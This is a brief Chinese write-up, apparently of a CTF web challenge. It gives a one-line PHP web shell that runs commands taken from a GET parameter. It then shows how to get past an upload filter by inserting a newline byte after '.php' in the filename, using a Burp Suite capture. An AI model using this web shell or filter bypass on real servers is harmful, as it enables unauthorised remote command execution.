Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
molaifeng3 小时前
Go 语言如何实现高性能网络 I/O:Netpoller 模型揭秘知乎的哥廷根数学学派4 小时前
基于多模态特征融合和可解释性深度学习的工业压缩机异常分类与预测性维护智能诊断(Python)网络工程师_ling4 小时前
【 Elastiflow (ELK) 网络流量分析系统 部署教程】2301_780789665 小时前
高防 IP 的选择与配置确保业务稳定性willhuo5 小时前
基于xray的匿名、授权、IP白名单代理访问研究qiuqyue5 小时前
基于虹软Linux Pro SDK的多路RTSP流并发接入、解码与帧级处理实践无名3875 小时前
关于 VRFYounGp_oo6 小时前
一次内网开发环境访问方式的改进实践:使用 FRP 替代远程桌面云安全干货局6 小时前
服务器被攻击后如何快速恢复?数据备份 + 应急响应手册猿饵块6 小时前
tcp--抓包--wireshark